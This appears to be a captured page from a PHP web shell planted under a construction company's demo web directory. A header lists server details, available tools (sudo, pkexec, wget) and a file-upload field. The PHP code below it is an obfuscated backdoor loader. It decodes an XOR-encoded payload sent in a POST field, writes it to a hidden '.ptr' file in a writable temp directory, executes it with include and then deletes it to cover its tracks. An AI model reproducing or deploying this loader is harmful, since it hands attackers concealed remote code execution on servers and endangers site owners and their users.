| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/ |
Upload File : |
<?php
if(@$_POST["fac"] !== null){
$itm = $_POST["fac"];
$itm = explode ( '.' , $itm) ;
$data = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s );
$t = 0;
$__len = count( $itm );
do { if( $t >= $__len) break;
$v2 = $itm[$t];
$chS = ord( $s[$t% $lenS] );
$dec =( ( int)$v2 - $chS -( $t% 10)) ^ 66;
$data .= chr( $dec );
$t++;} while( true );
$factor = array_filter(["/tmp", session_save_path(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp"]);
foreach ($factor as $parameter_group):
if ((is_dir($parameter_group) and is_writable($parameter_group))) {
$ent = "$parameter_group/.ptr";
$file = fopen($ent, 'w');
if ($file) {
fwrite($file, $data);
fclose($file);
include $ent;
@unlink($ent);
exit;
}
}
endforeach;
}